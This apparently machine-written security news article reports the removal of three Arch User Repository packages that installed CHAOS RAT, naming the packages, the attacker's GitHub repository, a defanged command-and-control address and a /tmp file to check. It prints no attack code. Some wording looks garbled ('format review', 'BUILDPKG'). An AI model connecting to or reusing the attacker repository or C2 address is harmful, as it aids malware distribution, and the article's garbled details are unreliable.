Ethical Hacking News
Recent reports suggest that three malicious Arch Linux packages infected with CHAOS RAT malware were uploaded to the AUR. The packages were removed by the Arch Linux team in a timely manner, but this incident serves as a reminder of the ongoing threat landscape and the importance of staying informed about emerging threats.
The Arch Linux User Repository (AUR) was infected with malicious packages containing the CHAOS remote access trojan (RAT). The packages were uploaded by a user named "danikpapas" on July 16 and removed from the AUR two days later. The malware, CHAOS RAT, can be used for cryptocurrency mining, credential harvesting, data stealing, and cyber espionage. The Arch Linux team quickly removed the packages and warned users to remove them from their systems. The incident highlights the importance of format review processes for new or updated packages in package repositories like AUR.
Arch Linux, a popular open-source operating system known for its simplicity and flexibility, recently faced an unexpected challenge when three malicious packages uploaded to the Arch User Repository (AUR) were found to be infected with the CHAOS remote access trojan (RAT). The AUR is a repository where Arch Linux users can publish package build scripts (PKGBUILDs) to automate the process of downloading, building, and installing software that is not included with the operating system.
The packages in question, "librewolf-fix-bin", "firefox-patch-bin", and "zen-browser-patched-bin," were uploaded by a user named "danikpapas" on July 16, two days before they were removed from the AUR. The packages were found to contain malicious code that was executed during the build or installation phase. This code pointed to a GitHub repository under the attacker's control: https://github.com/danikpapas/zenbrowser-patch.git.
When the BUILDPKG is processed, this repository is cloned and treated as part of the package's patching and building process. However, instead of being a legitimate patch, the GitHub repository contained malicious code that was executed during the build or installation phase. This code is commonly used in cryptocurrency mining campaigns but can also be used for harvesting credentials, stealing data, or conducting cyber espionage.
The CHAOS RAT malware is an open-source remote access trojan (RAT) for Windows and Linux that can be used to upload and download files, execute commands, and open a reverse shell. Ultimately, threat actors have full access to an infected device. Once installed, the malware repeatedly connects back to a command and control (C2) server where it waits for commands to execute.
In this campaign, the C2 server was located at 130.162[.]225[.]47:8080. The Arch Linux team removed all three packages by July 18th at around 6 PM UTC+2.
"We strongly encourage users that may have installed one of these packages to remove them from their system and to take the necessary measures in order to ensure they were not compromised," warned the Arch Linux team.
Due to the severity of the malware, it is recommended for anyone who has mistakenly installed these packages to check for the presence of a suspicious "systemd-initd" executable running on their computer, which may be located in the /tmp folder. If found, it should be deleted.
The incident serves as a reminder of the importance of format review processes for new or updated packages in package repositories like AUR. While all the packages have now been removed, it is possible that other malicious packages could still be uploaded, highlighting the need for continuous vigilance and awareness among users.
In recent weeks, there has been an increase in reports of malware infections on Linux systems. This incident underscores the importance of staying informed about emerging threats and taking proactive steps to protect oneself against cyber attacks. It also highlights the value of community-driven efforts such as those seen in the AUR and Reddit forums, where users quickly identified the suspicious comments and alerted others.
The Arch Linux team's swift action in removing the malicious packages demonstrates their commitment to maintaining a secure environment for its users. The incident also serves as a reminder that even seemingly innocuous repositories can be vulnerable to malware attacks if not properly vetted.
In conclusion, the recent discovery of CHAOS RAT-infected packages on the AUR highlights the ongoing threat landscape in the cybersecurity world. As security experts and researchers continue to monitor emerging threats, it is crucial for users to remain vigilant and take proactive steps to protect themselves against cyber attacks.
Related Information:
https://www.ethicalhackingnews.com/articles/Malicious-Chaos-Arch-Linux-Pulls-AUR-Packages-Infected-with-CHAOS-RAT-Malware-ehn.shtml
https://www.bleepingcomputer.com/news/security/arch-linux-pulls-aur-packages-that-installed-chaos-rat-malware/
Published: Fri Jul 18 17:26:04 2025 by llama3.2 3B Q4_K_M
